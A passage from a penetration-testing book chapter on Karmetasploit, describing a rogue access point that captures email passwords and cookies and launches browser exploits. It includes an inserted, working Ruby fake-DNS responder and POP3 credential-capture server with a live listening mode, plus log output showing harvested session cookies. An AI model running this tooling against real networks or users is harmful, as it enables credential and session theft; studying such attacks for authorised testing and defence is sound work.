Chapter 12
The POP3 server configured by Metasploit intercepts the target's email
username and password because the client's DNS lookup for its mail server,
like every other DNS request, is answered by the fake DNS server that
Karmetasploit set up for us, which points the client at our own POP3 listener.
Getting a Shell
At this point, the user has no new messages, so he decides to do some web
browsing. When the browser opens, a captive portal is presented to the user,
as shown in Figure 12-1.
Figure 12-1: Karmetasploit captive portal
As the user sits in front of his computer wondering what's going on,
Karmetasploit is busy configuring the attack to capture cookies; set up fake
email, DNS, and other servers; and launch exploits against the client's browser,
all driven by the modules that our karma.rc resource file loads.
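As an added example (not code from the book or from the Metasploit project), here is a stripped-down Ruby model of the two pieces described above: a fake DNS responder that answers every A query with the attacker's address, and a POP3 capture server that accepts any USER/PASS pair, records it, and then rejects the login. Karmetasploit does the same job with the auxiliary/server/fakedns and auxiliary/server/capture/pop3 modules; the attacker address 10.0.0.1, the `--listen` flag, and the sample DNS query and POP3 session lines are assumptions constructed for this example.

```ruby
# Added example, not from the book or Metasploit: a minimal model of
# Karmetasploit's fake DNS + POP3 credential capture.
require 'socket'

ATTACKER_IP = '10.0.0.1'  # assumption: address of the Karmetasploit host

# Parse the QNAME from a raw DNS query (length-prefixed labels ending in 0x00).
# Returns [name, offset just past the question section].
def parse_qname(packet, offset = 12)
  labels = []
  loop do
    len = packet.getbyte(offset)
    offset += 1
    break if len.nil? || len.zero?
    labels << packet.byteslice(offset, len)
    offset += len
  end
  [labels.join('.'), offset + 4]  # skip QTYPE and QCLASS
end

# Build a DNS response that answers whatever was asked with ATTACKER_IP.
# This is what steers the victim's mail client (and browser) to our listeners.
def fake_dns_response(query, ip = ATTACKER_IP)
  id = query.byteslice(0, 2)
  name, qend = parse_qname(query)
  question = query.byteslice(12, qend - 12)
  # flags 0x8180: response, recursion desired/available, NOERROR; 1 question, 1 answer
  header = id + [0x8180, 1, 1, 0, 0].pack('nnnnn')
  # answer: pointer to the name at offset 12, type A, class IN, TTL 60, 4-byte RDATA
  answer = [0xc00c, 1, 1, 60, 4].pack('nnnNn') + ip.split('.').map(&:to_i).pack('C4')
  [name, header + question + answer]
end

# POP3 server-side state machine: greet, accept USER and PASS from anyone,
# record the pair, then fail the login so the client just sees a bad password.
class Pop3Capture
  attr_reader :credentials

  def initialize
    @user = nil
    @credentials = []
  end

  def greeting
    "+OK POP3 server ready\r\n"
  end

  # Feed one client line, get the server's reply.
  def handle(line)
    cmd, arg = line.strip.split(' ', 2)
    case cmd.to_s.upcase
    when 'USER'
      @user = arg
      "+OK\r\n"
    when 'PASS'
      @credentials << [@user, arg] if @user
      "-ERR Login failed\r\n"
    when 'CAPA'
      "+OK\r\nUSER\r\n.\r\n"
    when 'QUIT'
      "+OK Bye\r\n"
    else
      "-ERR Unknown command\r\n"
    end
  end
end

# Drive a scripted session through the capture server; returns
# [captured credentials, server replies]. Lines are constructed, not captured.
def run_session(lines)
  srv = Pop3Capture.new
  replies = [srv.greeting] + lines.map { |l| srv.handle(l) }
  [srv.credentials, replies]
end

# Live mode (assumed flag): needs root for ports 53/110 and a victim whose
# DNS points at this host, which is what the Karmetasploit access point provides.
if __FILE__ == $0 && ARGV.first == '--listen'
  Thread.new do
    udp = UDPSocket.new
    udp.bind('0.0.0.0', 53)
    loop do
      pkt, addr = udp.recvfrom(512)
      name, resp = fake_dns_response(pkt)
      puts "[DNS] #{addr[3]} asked for #{name} -> #{ATTACKER_IP}"
      udp.send(resp, 0, addr[3], addr[1])
    end
  end
  tcp = TCPServer.new('0.0.0.0', 110)
  loop do
    client = tcp.accept
    srv = Pop3Capture.new
    client.write(srv.greeting)
    while (line = client.gets)
      client.write(srv.handle(line))
      break if line.strip.upcase == 'QUIT'
    end
    srv.credentials.each { |u, p| puts "[POP3] #{client.peeraddr[3]} #{u} / #{p}" }
    client.close
  end
end
```

Without `--listen` the file only defines the functions, so it can be exercised offline with a hand-built query and a scripted USER/PASS exchange; with it, the responder returns 10.0.0.1 for every name it is asked, and the POP3 side records the credentials before answering `-ERR`, so the mail client reports a failed login rather than a compromise.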
Of course, some degree of luck is involved in this attack. The browser
will display a "Loading" page while exploits are launched, and if the user is
impatient and simply closes the browser window, our exploits stop with it.
Next, you can see the massive amount of output that results from this attack:
[*] HTTP REQUEST 10.0.0.100 > www.microsoft.com:80 GET /isapi/redir.dll Windows IE 6.0
cookies=WT_NVR=0=/:1=downloads:2=downloads/en; WT_FPC=id=111.222.333.444-1008969152
.30063513:lv=1267703430218:ss=1267703362203;MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=
d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C864
18EBC913CE45C4326AE
[*] Request '/ads' from 10.0.0.100:1371
[*] HTTP REQUEST 10.0.0.100 > adwords.google.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > blogger.com:80 GET /forms.html Windows IE 6.0 cookies=